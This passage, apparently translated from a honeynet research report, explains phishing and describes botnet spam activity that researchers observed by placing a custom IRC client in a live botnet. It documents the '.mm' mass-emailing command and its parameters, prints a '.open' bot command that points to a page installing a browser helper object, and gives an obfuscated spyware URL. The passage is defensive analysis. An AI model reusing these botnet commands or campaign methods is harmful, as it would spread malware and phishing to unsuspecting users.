网络钓鱼是通过大量发送声称来自于银行或其他知名机构的欺骗性垃圾邮件,意图引诱收信人给出敏感信息(如用户名、口令、帐号 ID 、 ATM PIN 码或信用卡详细信息)的一种攻击方式。最典型的网络钓鱼攻击将收信人引诱到一个通过精心设计与目标组织的网站非常相似的钓鱼网站上,
关于这些指令实现的进一步信息,可以在这找到,以僵尸工具源码的注释形式给出。在 drone -一个由德国蜜网项目组开发的自定制 IRC 客户端的帮助下,通过利用我们的蜜网所捕获的网络连接数据将 drone 混入僵尸网络中,我们可以对僵尸网络如何被用以进行发送垃圾邮件 / 钓鱼邮件进行更深入的了解。以下将给出一些观察到的典型活动案例。
实例 1
在一个特定的僵尸网络中,我们观察到攻击者发出了以下指令(注意 URL 都已经被混淆了):
.mm (mass emailing) 指令是一个一般化的 spam_start 指令的定制版本。这个指令接收以下 4 个参数:
一个包含多个 Email 地址文件的 URL
包含在垃圾邮件中的目标网站地址链接-这个网站可能是一个普遍的垃圾网页,也可能是一个钓鱼网站
发送者的名字
邮件的主题
在本次攻击案例中,每次调用 fetch.php 脚本会返回 30 个不同的 Email 地址。对于每个收信者,将会构造一个 Email 邮件,将宣传指令中第二个参数给出的链接。在这个实例中,第二个参数的链接指向了一个企图在受害者主机上安装一个恶意 ActiveX 组件的网页。
实例 2
在另一个僵尸网络中,我们观察到在受害者 PC 上安装浏览器助手组件的攻击方式:
[TOPIC] # spam 9 :.open http://amateur.example.com/l33tag3/beta.html -s
.open 指令告诉每个僵尸工具打开所申请的网页并显示给受害者,在这个案例中,这个网页中包含一个浏览器助手组件,企图在受害者主机上安装自身。从这个 IRC 频道的名称可以显示出,这个僵尸网络也是用以发送垃圾邮件的。
实例 3
在另外一个僵尸网络上,我们观察到 spyware 传播的实例:
http://public.example.com/prompt.php?h=6d799fbeef 3a 9b 386587f 5f 7b 37f [...]
这个链接在对捕获到的恶意软件的分析中获得,它将受害者指向了一个提供“免费的广告传播软件”的公司的网页,这个网站包含了在企图访问客户端上安装 ActiveX 组件(推测是 adware 或 spyware )的多个页面。
网友评论